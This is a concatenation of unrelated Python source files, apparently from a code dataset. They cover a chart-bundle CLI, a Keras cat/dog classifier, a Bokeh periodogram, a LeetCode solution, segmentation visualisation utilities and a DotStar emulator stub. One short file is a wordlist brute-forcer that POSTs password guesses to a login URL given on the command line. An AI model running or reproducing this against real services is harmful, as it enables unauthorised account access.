    forces min to be zero and max to be the column max/min
    difference.
    """
    with oval.core.cli_context(obj) as bundle:
        if relative:
            # relative mode: read the chart's CSV to find each column's
            # min/max, then rescale per column to (0, max - min),
            # preserving the column's dtype for the lower bound
            metadata = bundle._get_metadata()
            with bundle.edit_archive() as arc_dir:
                chart_data_filename = metadata[
                    "chart_data"][int(index)]["filename"]
                fn = os.path.join(arc_dir, chart_data_filename)
                df = pd.read_csv(fn)
            for col in column:
                col_min, col_max = df[col].min(), df[col].max()
                logger.debug(
                    "relative rescaling: {} {}".format(col_min, col_max))
                bundle.rescale_chart_data(
                    int(index), *[col],
                    feature_range=(
                        type(col_min)(0.0), col_max - col_min))
        else:
            # absolute mode: single rescale of all columns to the range
            bundle.rescale_chart_data(
                int(index), *column, feature_range=(range_min, range_max))
@root.command()
@click.pass_obj
@click.argument('index')
def chart_data_columns(obj, index):
    """
    Return chart data column names.
    """
    # prints columns with their positional index
    with oval.core.cli_context(obj) as bundle:
        print(tabulate(enumerate(bundle.chart_data_columns(int(index)))))
@root.command()
@click.pass_obj
@click.option(
    '--title', '-t', help="Chart title")
@click.option(
    '--start-time', '-s', default=1.0, help="Signal start time")
@click.option(
    '--end-time', '-e', default=11.0, help="Signal end time")
@click.option(
    '--num-samples', '-n', default=1000, help="How many rows to generate")
@click.option(
    '--amplitude', '-a', default=0.5, help="Signal amplitude")
@click.option(
    '--frequency', '-f', default=4, help="Signal frequency")
@click.option(
    '--phase', '-p', default=0.0, help="Signal phase")
@click.option(
    '--y-offset', '-y', default=0.0, help="Signal phase")
@click.option(
    '--x-label', '-i', default="Time (s)", help="x axis chart label")
@click.option(
    '--y-label', '-j', default="Sample", help="y axis chart label")
def gen_chart(
        obj, title, start_time, end_time,
        num_samples, amplitude, frequency, phase, y_offset,
        x_label, y_label):
    """
    Generate sinusoidal chart data for testing.
    """
    with oval.core.cli_context(obj) as bundle:
        # write the samples to a temp CSV first, then import it as a chart;
        # delete=False so the file survives the first `with` on all platforms
        with tempfile.NamedTemporaryFile(suffix=".csv", delete=False) as f:
            temp_filename = f.name
        with open(temp_filename, 'w', newline='') as csvfile:
            inst_writer = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)
            inst_writer.writerow(['time', 'sample'])
            sample_time = start_time
            inc = (end_time - start_time)/num_samples
            while sample_time < end_time:
                # y(t) = A * sin(2*pi*f*t + phase) + offset
                yt = amplitude * math.sin(
                    2*math.pi * frequency * sample_time + phase) + y_offset
                inst_writer.writerow([sample_time, yt])
                sample_time += inc
        if title is None:
            title = os.path.basename(temp_filename)
        bundle.add_chart(
            temp_filename, title=title,
            x_label=x_label, y_label=y_label)
        os.remove(temp_filename)
@root.command()
@click.pass_obj
@click.argument('args', nargs=-1)
def remove_chart(obj, args):
    """
    Remove chart data from the bundle by indices.
    """
    # args: chart indices as strings, converted to int in one pass
    with oval.core.cli_context(obj) as bundle:
        bundle.remove_charts([int(i) for i in args])
@root.command()
@click.pass_obj
@click.argument('idx', nargs=1)
def chart_info(obj, idx):
    """
    Print chart information.
    """
    # dump all key/value attributes of the chart at the given index
    with oval.core.cli_context(obj) as bundle:
        print(tabulate(bundle.get_chart(int(idx)).items()))
@root.command()
@click.pass_obj
@click.option(
    '--from-addr', '-f', help="From email address.")
@click.option(
    '--to-addr', '-t', help="To email address.")
@click.option(
    '--smtp-host', '-s', help="SMTP host")
@click.option(
    '--smtp-port', '-p', help="SMTP port")
@click.option(
    '--smtp-user', '-u', help="SMTP user")
@click.option(
    '--smtp-password', '-p', help="SMTP password")
@click.option(
    '--title', '-t', help="Post title", default=None)
def publish(
        obj, from_addr, to_addr, smtp_host, smtp_port,
        smtp_user, smtp_password, title):
    """
    Publish the bundle by email.
    """
    # NOTE(review): short flags '-p' (smtp-port/smtp-password) and '-t'
    # (to-addr/title) are duplicated; changing them would break the CLI
    # interface, so they are only flagged here.
    with oval.core.cli_context(obj) as bundle:
        metadata = bundle.read_attributes()
        # optional body text/html and uuid come from bundle metadata
        text = ""
        html = None
        uuid_str = None
        if "text" in metadata:
            text = bundle.read_file(metadata["text"]).decode()
        if "html" in metadata:
            html = bundle.read_file(metadata["html"]).decode()
        if "uuid" in metadata:
            uuid_str = metadata["uuid"]
        else:
            # fall back to a fresh uuid so the post still has an identifier
            logger.warning("missing metadata uuid")
            uuid_str = str(uuid.uuid1())
        if title is None:
            title = uuid_str
        kwargs = {
            "smtp_host": smtp_host,
            "smtp_port": int(smtp_port),
            "smtp_user": smtp_user,
            # BUG FIX: restore the credential-scrubbed placeholder
            # ("<PASSWORD>_password", a syntax error) to the CLI parameter.
            "smtp_password": smtp_password}
        if html is not None:
            kwargs["html_body"] = html
        # attach the bundle file itself to the email
        files = [(obj.bundle, os.path.basename(obj.bundle), None)]
        logger.info("Publishing '{}' to {}".format(title, to_addr))
        oval.core.send_email(
            from_addr, to_addr, title, text, files=files, **kwargs)
| StarcoderdataPython |
55277 | import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
from tensorflow.python.keras.callbacks import TensorBoard
from tqdm import tqdm
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
import random
import pickle
import logging
import logging.config
import sys
import time
# dictConfig schema v1: route root-logger records at INFO+ to stdout
LOGGING = {
    'version': 1,
    'handlers': {
        'console': {
            'class': 'logging.StreamHandler',
            'stream': sys.stdout,
        }
    },
    'root': {
        'handlers': ['console'],
        'level': 'INFO'
    }
}
logging.config.dictConfig(LOGGING)
# dataset root (machine-specific absolute path)
DATADIR = "/home/pedro/Área de Trabalho/PetImages"
# class labels by list position: 0 = Cachorro (dog), 1 = Gato (cat)
CATEGORIES = ["Cachorro", "Gato"]
# accumulator for (image, label) pairs filled by the (commented-out) loaders
training_data = []
# images are resized to IMG_SIZE x IMG_SIZE grayscale before training
IMG_SIZE = 50
def prepare(filepath):
    """Load one image as grayscale, resize to IMG_SIZE x IMG_SIZE, and
    reshape to the (1, H, W, 1) layout the model expects."""
    gray = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)
    resized = cv2.resize(gray, (IMG_SIZE, IMG_SIZE))
    return resized.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# def loadData():
#
# for category in CATEGORIES: # do dogs and cats
# path = os.path.join(DATADIR, category) # create path to dogs and cats
#
# for img in os.listdir(path): # iterate over each image per dogs and cats
#
# img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE) # convert to array
# plt.imshow(img_array, cmap='gray') # graph it
# plt.show() # display!
#
# break # we just want one for now so break
# break #...and one more!
# def create_training_data():
# for category in CATEGORIES: # do dogs and cats
#
# path = os.path.join(DATADIR, category) # create path to dogs and cats
# class_num = CATEGORIES.index(category) # get the classification (0 or a 1). 0=dog 1=cat
#
# for img in tqdm(os.listdir(path)): # iterate over each image per dogs and cats
# try:
# img_array = cv2.imread(os.path.join(path,img) ,cv2.IMREAD_GRAYSCALE) # convert to array
# new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize to normalize data size
# training_data.append([new_array, class_num]) # add this to our training_data
# except Exception as e:
# pass
#except OSError as e:
# print("OSErrroBad img most likely", e, os.path.join(path,img))
#except Exception as e:
# print("general exception", e, os.path.join(path,img))
# def main():
# loadData()
# create_training_data()
# print(len(training_data))
# shuffle_train_and_save()
# train3()
#open_model_64x3()
#
#
# def shuffle_train_and_save():
# random.shuffle(training_data)
# for sample in training_data[:10]:
# print(sample[1])
#
# X = []
# y = []
# for features, label in training_data:
# X.append(features)
# y.append(label)
#
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
#
# pickle_out = open("X.pickle", "wb")
# pickle.dump(X, pickle_out)
# pickle_out.close()
#
# pickle_out = open("y.pickle", "wb")
# pickle.dump(y, pickle_out)
# pickle_out.close()
def open_data():
    """Load the pickled training arrays from the working directory.

    Returns:
        tuple: ``(X, y)`` where ``X`` is the feature array with pixel
        intensities rescaled from [0, 255] to [0.0, 1.0] and ``y`` is the
        matching sequence of labels.
    """
    # Use context managers so both file handles are closed even on error
    # (the original opened the files and never closed them).
    with open("X.pickle", "rb") as pickle_in:
        X = pickle.load(pickle_in)
    with open("y.pickle", "rb") as pickle_in:
        y = pickle.load(pickle_in)
    X = X / 255.0  # normalize pixel intensities to [0, 1]
    return X, y
#
# def model(X, y):
#
# model = Sequential()
#
# model.add(Conv2D(256, (3, 3), input_shape=X.shape[1:]))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Conv2D(256, (3, 3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
#
# model.add(Dense(64))
#
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
#
# model.compile(loss='binary_crossentropy',
# optimizer='adam',
# metrics=['accuracy'])
#
# model.fit(X, y, batch_size=32, epochs=3, validation_split=0.3)
#
#
# def train():
#
# NAME = "Cats-vs-dogs-64x2-CNN"
# X,y = open_data()
# model = Sequential()
#
# model.add(Conv2D(64, (3, 3), input_shape=X.shape[1:]))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Conv2D(64, (3, 3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
# model.add(Dense(64))
# model.add(Activation('relu'))
#
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
#
# tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))
#
# model.compile(loss='binary_crossentropy',
# optimizer='adam',
# metrics=['accuracy'],
# )
#
# model.fit(X, y,
# batch_size=32,
# epochs=10,
# validation_split=0.3,
# callbacks=[tensorboard])
#
#
# def train2():
#
# X,y = open_data()
#
# dense_layers = [0, 1, 2]
# layer_sizes = [32, 64, 128]
# conv_layers = [1, 2, 3]
#
# for dense_layer in dense_layers:
# for layer_size in layer_sizes:
# for conv_layer in conv_layers:
# import time
# NAME = "{}-conv-{}-nodes-{}-dense-{}".format(conv_layer, layer_size, dense_layer, int(time.time()))
# print(NAME)
#
# model = Sequential()
#
# model.add(Conv2D(layer_size, (3, 3), input_shape=X.shape[1:]))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# for l in range(conv_layer-1):
# model.add(Conv2D(layer_size, (3, 3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Flatten())
#
# for _ in range(dense_layer):
# model.add(Dense(layer_size))
# model.add(Activation('relu'))
#
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
#
# tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))
#
# model.compile(loss='binary_crossentropy',
# optimizer='adam',
# metrics=['accuracy'],
# )
#
# model.fit(X, y,
# batch_size=32,
# epochs=10,
# validation_split=0.3,
# callbacks=[tensorboard])
#
#
# def train3():
#
# X, y = open_data()
#
# dense_layers = [0]
# layer_sizes = [64]
# conv_layers = [3]
#
# for dense_layer in dense_layers:
# for layer_size in layer_sizes:
# for conv_layer in conv_layers:
# import time
# NAME = "{}-conv-{}-nodes-{}-dense-{}".format(conv_layer, layer_size, dense_layer, int(time.time()))
# print(NAME)
#
# model = Sequential()
#
# model.add(Conv2D(layer_size, (3, 3), input_shape=X.shape[1:]))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# for l in range(conv_layer-1):
# model.add(Conv2D(layer_size, (3, 3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Flatten())
#
# for _ in range(dense_layer):
# model.add(Dense(layer_size))
# model.add(Activation('relu'))
#
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
#
# tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))
#
# model.compile(loss='binary_crossentropy',
# optimizer='adam',
# metrics=['accuracy'],
# )
#
# model.fit(X, y,
# batch_size=32,
# epochs=10,
# validation_split=0.3,
# callbacks=[tensorboard])
#
# model.save('64x3-CNN.model')
#
def open_model_64x3(path):
    """Classify the image at *path* with the pre-trained 64x3 CNN.

    Loads the saved Keras model, predicts on the prepared image and
    returns the predicted class name from ``CATEGORIES``.

    :param path: filesystem path of the image to classify.
    :return: element of ``CATEGORIES`` selected by the model output.
    """
    # NOTE(review): the model path is hard-coded relative to the current
    # working directory — confirm callers always run from the project root.
    model = tf.keras.models.load_model("source/core/machine/64x3-CNN.model")
    # `prepare(path)` presumably yields a (1, IMG_SIZE, IMG_SIZE, 1) array;
    # wrapping it in a list hands predict() a batch of one — TODO confirm.
    prediction = model.predict([prepare(path)])
    logging.info(time.time())  # timestamp the prediction in the log
    # The single sigmoid output is truncated to 0/1 and used as class index.
    logging.info(CATEGORIES[int(prediction[0][0])])
    return CATEGORIES[int(prediction[0][0])]
| StarcoderdataPython |
181412 | <reponame>johnche/troll-simulator
import numpy as np
import scipy.signal as signal
from pandas import DataFrame, to_datetime
from bokeh.plotting import figure
from bokeh.layouts import column, row
from bokeh.models import ColumnDataSource, Panel
from bokeh.models.widgets import CheckboxGroup, RadioButtonGroup, PreText, Paragraph
class ProcessedData:
    """Lomb-Scargle spectral analysis of the 'ECG LL-RA CAL (mVolts)' channel."""

    def __init__(self, logdata: DataFrame):
        """Filter *logdata* to the ECG lead-II channel and compute its periodogram.

        :param logdata: log frame with at least Name/Timestamp/Value columns.
        """
        # Keep only the ECG LL-RA samples.
        self.logdata = logdata[logdata.Name == 'ECG LL-RA CAL (mVolts)']
        print(self.logdata.head(4).values)
        num_frequencies = 100000
        # Frequency grid scanned by the periodogram.
        frequencies = np.linspace(0.01, 50, num_frequencies)
        # Lomb-Scargle handles unevenly sampled timestamps directly.
        periodogram = signal.lombscargle(self.logdata.Timestamp, self.logdata.Value, frequencies)
        self.plot_data = DataFrame(columns=['frequencies', 'power'])
        self.plot_data.frequencies = frequencies
        self.plot_data.power = periodogram

    def tab(self, name):
        """Return a Bokeh Panel titled *name* plotting power vs. frequency."""
        # NOTE(review): `conf` is not among this module's visible imports —
        # confirm it is provided elsewhere, otherwise this raises NameError.
        fig = figure(
            title='Lomb Scargle Periodogram',
            plot_width=conf.PLOTWIDTH,
            plot_height=conf.PLOTHEIGHT,
            x_axis_label='Frequency',
            y_axis_label='Power'
        )
        fig.line('frequencies', 'power', source=self.plot_data, line_width=2)
        layout = column(Paragraph(text='Lomb Scargle Periodogram of LL-RA physio'), fig)
        return Panel(child=layout, title=name)
| StarcoderdataPython |
3241965 | <gh_stars>0
from collections import defaultdict
class Solution:
    """
    @param cpdomains: a list cpdomains of count-paired domains
    @return: a list of count-paired domains
    """
    def subdomainVisits(self, cpdomains):
        """Aggregate visit counts for every domain and sub-domain.

        Each entry of *cpdomains* looks like "9001 discuss.leetcode.com";
        its count is credited to "discuss.leetcode.com", "leetcode.com"
        and "com".

        :param cpdomains: list of "count domain" strings.
        :return: list of "count domain" strings, one per (sub)domain seen.
        """
        counts = defaultdict(int)  # int() == 0; idiomatic zero default
        for cpdomain in cpdomains:
            count_str, domain = cpdomain.split()
            count = int(count_str)
            labels = domain.split('.')
            # Credit every suffix: "a.b.c" -> "c", "b.c", "a.b.c".
            for start in range(len(labels) - 1, -1, -1):
                suffix = '.'.join(labels[start:])
                counts[suffix] += count
        return ['{} {}'.format(total, dom) for dom, total in counts.items()]
| StarcoderdataPython |
1690360 | <gh_stars>0
import requests
from sys import argv
# SECURITY NOTE(review): this script brute-forces credentials against `url`.
# It must only ever be run against systems you are explicitly authorised
# to test.
file__ = argv[1]  # path of the wordlist file (one candidate per line)
# NOTE(review): '<EMAIL>' / <PASSWORD> are redaction placeholders left by
# dataset anonymisation; <PASSWORD> is not valid Python, so the script
# cannot run until they are replaced with real values.
data = {
    'email': '<EMAIL>',
    'password': <PASSWORD>
}
url = argv[2]  # target login endpoint
num = 0  # count of rejected attempts so far
with open(file__, 'r') as a_file:
    for lines in a_file:
        line = lines.strip()
        data['password'] = line  # try the next candidate
        print(str(data) + " " + str(num))
        r = requests.post(url, data = data)
        if r.status_code >= 400:
            # Any 4xx/5xx response is treated as "wrong password".
            num += 1
            pass
        else:
            print("THE CORRECT PASSWORD IS >>" + data['password'])
            break
| StarcoderdataPython |
1685900 | <gh_stars>100-1000
import logging
import math
import re
import warnings
from pathlib import Path
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image
from matplotlib import pyplot as plt, gridspec, cm, colors
import csv
from utils.utils import unscale, unnormalize, get_key_def
from utils.geoutils import create_new_raster_from_base
import matplotlib
# Select the non-interactive Agg backend so figures render without a display.
# NOTE(review): pyplot is imported above, *before* this call — switching the
# backend after importing pyplot only works on newer matplotlib; confirm, or
# move this call above the pyplot import.
matplotlib.use('Agg')
# NOTE(review): the logger returned here is discarded; presumably this was
# meant to be assigned, e.g. `logger = logging.getLogger(__name__)`.
logging.getLogger(__name__)
def grid_vis(input_, output, heatmaps_dict, label=None, heatmaps=True):
    """Assemble input/label/output tiles (plus optional per-class heatmaps)
    into a single matplotlib grid figure.

    :param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
    :param output: (tensor) output array as pytorch tensor, e.g. as returned by dataloader
    :param heatmaps_dict: (dict) heatmaps keyed by class grayscale value; each
        value is {'class_name': str, 'heatmap_PIL': PIL image}
    :param label: (tensor) optional label array as pytorch tensor
    :param heatmaps: (bool) when True, heatmap tiles are appended to the grid
    :return: the matplotlib.pyplot module, ready for saving to disk
    """
    if label is not None:
        tiles = [input_, label, output]
    else:
        tiles = [input_, output]
    titles = ['input', 'label', 'output'] if label is not None else ['input', 'output']

    # The figure is sized for the full tile count (heatmaps included),
    # laid out four tiles per row.
    total = len(tiles) + len(heatmaps_dict)
    n_rows = math.ceil(total / 4)
    n_cols = total if total < 4 else 4
    plt.figure(figsize=(n_cols * 6, n_rows * 6))
    grid_spec = gridspec.GridSpec(n_rows, n_cols)

    if heatmaps:
        for entry in heatmaps_dict.values():
            tiles.append(entry['heatmap_PIL'])
            titles.append(entry['class_name'])

    assert len(tiles) == len(titles)
    for position, (img, title) in enumerate(zip(tiles, titles)):
        plt.subplot(grid_spec[position])
        plt.imshow(img)
        plt.grid(False)
        plt.axis('off')
        plt.title(title)
    plt.tight_layout()
    return plt
def vis_from_batch(vis_params,
                   inputs,
                   outputs,
                   batch_index,
                   vis_path,
                   labels=None,
                   dataset='',
                   ep_num=0,
                   scale=None,
                   debug=False):
    """Dispatch each (input, label, output) triplet of a batch to vis().

    :param vis_params: (dict) parameters useful during visualization
    :param inputs: (tensor) inputs with dimensions (batch_size, channels, width, height)
    :param outputs: (tensor) outputs with dimensions (batch_size, channels, width, height)
    :param batch_index: (int) index of the batch inside the epoch
    :param vis_path: path where visualisation images will be saved
    :param labels: (tensor) optional labels with the same leading dimensions
    :param dataset: (str) dataset name for file naming (e.g. 'tst')
    :param ep_num: (int) epoch number for file naming
    :param scale: optional (min, max) range forwarded to vis()
    :param debug: (bool) if True, enables extra debug behaviour in vis()
    """
    if labels is None:
        # Dummy labels keep the zip() below valid when no ground truth exists.
        labels = [None] * len(outputs)
    offset = len(inputs) * batch_index  # position of this batch inside the epoch
    for sample_idx, (input_, label, output) in enumerate(zip(inputs, labels, outputs)):
        vis(vis_params, input_, output,
            vis_path=vis_path,
            sample_num=offset + sample_idx + 1,
            label=label,
            dataset=dataset,
            ep_num=ep_num,
            scale=scale,
            debug=debug)
def vis(vis_params,
        input_,
        output,
        vis_path,
        sample_num=0,
        label=None,
        dataset='',
        ep_num=0,
        inference_input_path=None,
        scale=None,
        debug=False):
    """saves input, output and label (if given) as .png in a grid or as individual pngs
    :param vis_params: (dict) visualization settings (mean/std, colormap_file, grid, heatmaps, ignore_index, ...)
    :param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
    :param output: (tensor) output array as pytorch tensor before argmax, e.g. as returned by dataloader
    :param vis_path: path where visualisation images will be saved
    :param sample_num: index of sample if function is from for loop iterating through a batch or list of images.
    :param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader. Optional.
    :param dataset: (str) name of dataset arrays belong to. For file-naming purposes only.
    :param ep_num: (int) number of epoch arrays are inputted from. For file-naming purposes only.
    :param inference_input_path: (Path) path to input image on which inference is being performed. If given, turns «inference» bool to True below.
    :param scale: optional (min, max) float range the data was scaled to; used to unscale back to 0-255.
    :param debug: (bool) if True, extra sanity warnings/logging are produced.
    :return: saves color images from input arrays as grid or as full scale .png
    """
    # TODO: Temporary fix, need to be discuss, `input_` is a list if the initial input as NIR with the RGB at [0].
    # The `squeeze` fonction cut the useless dimension, append in inference.
    input_ = np.squeeze(input_[0]) if type(input_) is list else np.squeeze(input_)
    assert vis_path.parent.is_dir()
    vis_path.mkdir(exist_ok=True)
    # Training/validation path: tensors arrive raw, so softmax and the
    # channels-last conversion happen here (inference arrives pre-softmaxed).
    if not vis_params[
        'inference_input_path']: # FIXME: function parameters should not come in as different types if inference or not.
        input_ = input_.cpu().permute(1, 2, 0).numpy() # channels last
        output = F.softmax(output, dim=0) # Inference output is already softmax
        output = output.detach().cpu().permute(1, 2, 0).numpy() # channels last
        if label is not None:
            label_copy = label.cpu().numpy().copy()
            if vis_params['ignore_index'] < 0:
                new_ignore_index = 255
                # Convert all pixels with ignore_index values to 255 to make sure it is last in order of values.
                label_copy[label_copy == vis_params['ignore_index']] = new_ignore_index
    # Undo dataset normalization and scaling so the png shows real colors.
    if vis_params['mean'] and vis_params['std']:
        input_ = unnormalize(input_img=input_, mean=vis_params['mean'], std=vis_params['std'])
    input_ = unscale(img=input_, float_range=(scale[0], scale[1]), orig_range=(0, 255)) if scale else input_
    if 1 <= input_.shape[2] <= 2:
        input_ = input_[:, :, :1] # take first band (will become grayscale image)
        input_ = np.squeeze(input_)
    elif input_.shape[2] >= 3:
        input_ = input_[:, :, :3] # take three first bands assuming they are RGB in correct order
    # NOTE(review): after the squeeze above a 1- or 2-band input becomes 2-D,
    # so input_.shape[2] on the next line would raise IndexError — confirm
    # grayscale inputs are actually exercised (see TODO two lines down).
    mode = 'L' if input_.shape[2] == 1 else 'RGB' # https://pillow.readthedocs.io/en/3.1.x/handbook/concepts.html#concept-modes
    input_PIL = Image.fromarray(input_.astype(np.uint8), mode=mode) # TODO: test this with grayscale input.
    # Give value of class to band with highest value in final inference
    output_argmax = np.argmax(output, axis=2).astype(np.uint8) # Flatten along channels axis. Convert to 8bit
    # Define colormap and names of classes with respect to grayscale values
    classes, cmap = colormap_reader(output, vis_params['colormap_file'], default_colormap='Set1')
    heatmaps_dict = heatmaps_to_dict(output, classes, inference=inference_input_path,
                                     debug=debug) # Prepare heatmaps from softmax output
    # Convert output and label, if provided, to RGB with matplotlib's colormap object
    output_argmax_color = cmap(output_argmax)
    output_argmax_PIL = Image.fromarray((output_argmax_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
    if not inference_input_path and label is not None:
        label_color = cmap(label_copy)
        label_PIL = Image.fromarray((label_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
    else:
        label_PIL = None
    # Three output modes: georeferenced tif (inference), one grid png,
    # or individual pngs per array.
    if inference_input_path is not None:
        if debug and len(np.unique(output_argmax)) == 1:
            warnings.warn(f'Inference contains only {np.unique(output_argmax)} value. Make sure data scale '
                          f'{scale} is identical with scale used for training model.')
        output_name = vis_path.joinpath(f"{inference_input_path.stem}_inference.tif")
        create_new_raster_from_base(inference_input_path, output_name, output_argmax)
        if vis_params['heatmaps_inf']:
            for key in heatmaps_dict.keys():
                heatmap = np.array(heatmaps_dict[key]['heatmap_PIL'])
                class_name = heatmaps_dict[key]['class_name']
                heatmap_name = vis_path.joinpath(f"{inference_input_path.stem}_inference_heatmap_{class_name}.tif")
                create_new_raster_from_base(inference_input_path, heatmap_name, heatmap)
    elif vis_params['grid']: # SAVE PIL IMAGES AS GRID
        grid = grid_vis(input_PIL, output_argmax_PIL, heatmaps_dict, label=label_PIL, heatmaps=vis_params['heatmaps'])
        grid.savefig(vis_path.joinpath(f'{dataset}_{sample_num:03d}_ep{ep_num:03d}.png'))
        plt.close()
    else: # SAVE PIL IMAGES DIRECTLY TO FILE
        # The satellite image itself never changes between epochs; write once.
        if not vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg').is_file():
            input_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg'))
        if not inference_input_path and label is not None:
            label_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_label.png')) # save label
        output_argmax_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_output_ep{ep_num:03d}.png'))
        if vis_params['heatmaps']: # TODO: test this.
            for key in heatmaps_dict.keys():
                heatmap = heatmaps_dict[key]['heatmap_PIL']
                class_name = heatmaps_dict[key]['class_name']
                heatmap.save(vis_path.joinpath(f"{dataset}_{sample_num:03d}_output_ep{ep_num:03d}_heatmap_{class_name}.png")) # save heatmap
def heatmaps_to_dict(output, classes=None, inference=False, debug=False):
    """Build one PIL heatmap per class channel of a softmax output.

    :param output: (H, W, C) softmax array, one channel per class.
    :param classes: optional sequence of class names aligned with channels;
        defaults to the channel indices. (Default changed from the mutable
        ``[]`` to ``None`` — identical behaviour, avoids the shared-mutable-
        default pitfall.)
    :param inference: when truthy, keep raw grayscale probabilities
        (no colormap applied).
    :param debug: when True (with inference), log per-class value summaries.
    :return: dict mapping channel index -> {'class_name': ..., 'heatmap_PIL': ...}
    """
    heatmaps_dict = {}
    if classes is None or len(classes) == 0:
        classes = range(output.shape[2])
    cmap = None if inference else cm.get_cmap('inferno')  # hoisted out of the loop
    for i in range(output.shape[2]):  # one heatmap per channel (i.e. class)
        perclass_output = output[:, :, i]
        if inference:  # don't colour the heatmap during inference
            if debug:
                logging.info(f'Heatmap class: {classes[i]}\n')
                logging.info(f'List of unique values in heatmap: {np.unique(np.uint8(perclass_output * 255))}\n')
            perclass_output_PIL = Image.fromarray(np.uint8(perclass_output*255))
        else:
            # https://stackoverflow.com/questions/10965417/how-to-convert-numpy-array-to-pil-image-applying-matplotlib-colormap
            perclass_output_PIL = Image.fromarray(np.uint8(cmap(perclass_output) * 255))
        heatmaps_dict[i] = {'class_name': classes[i], 'heatmap_PIL': perclass_output_PIL}
    return heatmaps_dict
def colormap_reader(output, colormap_path=None, default_colormap='Set1'):
    """Resolve class names and a colormap for rendering class indices.

    :param output: (H, W, C) array; C bounds how many classes need colors.
    :param colormap_path: csv file (with header) containing 3 columns
        (input grayscale value, classes, html colors (#RRGGBB)).
    :param default_colormap: matplotlib colormap name used when no csv given.
    :return: list of classes and colormap mapping grayscale values to colors.
    :raises ValueError: on a missing csv, a malformed color code, or too few
        entries for the number of classes in output. (Replaces the previous
        ``assert`` statements, which vanish under ``python -O``.)
    """
    if colormap_path is not None:
        if not Path(colormap_path).is_file():
            raise ValueError(f'Could not locate {colormap_path}')
        input_val = []
        classes_list = ['background']
        html_colors = ['#000000']
        # Renamed the handle: the original shadowed the builtin `file`.
        with open(colormap_path, 'rt') as csv_file:
            reader = csv.reader(csv_file)
            next(reader)  # Skip header
            rows = list(reader)
        input_val.extend([int(row[0]) for row in rows])
        csv_classes = [row[1] for row in rows]  # second column: class name
        csv_html_colors = [row[2] for row in rows]  # third column: hex color code
        # Re-order both columns by their grayscale value.
        sorted_classes = [x for _, x in sorted(zip(input_val, csv_classes))]
        sorted_colors = [x for _, x in sorted(zip(input_val, csv_html_colors))]
        for color in sorted_colors:
            if not re.search(r'^#(?:[0-9a-fA-F]{3}){1,2}$', color):
                raise ValueError(f'Submitted color {color} does not match HEX color code pattern')
        classes_list.extend(sorted_classes)
        html_colors.extend(sorted_colors)
        if not (len(html_colors) == len(classes_list) >= output.shape[2]):
            raise ValueError('Not enough colors and class names for number of classes in output')
        html_colors.append('white')  # for ignore_index values in labels. #TODO: test this with a label containt ignore_index values
        cmap = colors.ListedColormap(html_colors)
    else:
        # No csv: fall back to numeric class names and a stock colormap.
        classes_list = list(range(0, output.shape[2]))
        cmap = cm.get_cmap(default_colormap)
    return classes_list, cmap
| StarcoderdataPython |
1734445 | <gh_stars>10-100
import pandas as pd
# Load the training data and centre the Age column around its mean.
Data = pd.read_csv('train.csv')
mean_age = Data.Age.mean()
# Vectorised approach: subtract the mean from every Age via map().
print(Data.Age.map(lambda p: p - mean_age))
### USING APPLY() METHOD
def score(row):
    # NOTE(review): this mutates the row object handed in by apply() and
    # returns it; confirm the in-place mutation of `row` is intended rather
    # than building a new Series.
    row.Age = row.Age - mean_age
    return row
print(Data.apply(score, axis="columns").Age)
163652 | <reponame>chrisrossx/DotStar_Emulator<filename>DotStar_Emulator/emulator/send_test_data.py
from __future__ import print_function
from multiprocessing.connection import Client
import random
import os
import time
from PIL import Image
import pygame
from .vector2 import Vector2
from DotStar_Emulator.emulator import config
from DotStar_Emulator.emulator.utils import blend_color
from DotStar_Emulator.emulator.data import MappingData
class App(object):
    """Base class for test-data senders: builds a DotStar frame buffer and
    streams it to the emulator over a multiprocessing Client connection.

    Subclasses set ``data_type`` and implement :meth:`on_loop` to fill
    ``self.data`` before each send.
    """

    data_type = None  # human-readable description, set by subclasses

    def __init__(self, args):
        """
        :param args: parsed CLI namespace with ``rate`` and/or ``loop``.
        """
        self.args = args

        self.mapping_data = MappingData()

        self.grid_size = Vector2(config.get("GRID_SIZE"))
        self.pixel_count = self.mapping_data.pixel_count

        # 4 bytes per pixel (control/brightness, blue, green, red);
        # data does not include start and end bytes
        size = self.pixel_count * 4
        self.data = bytearray(size)

        self.connection = None

        print("Data Type:", self.data_type)

        if self.args.rate:
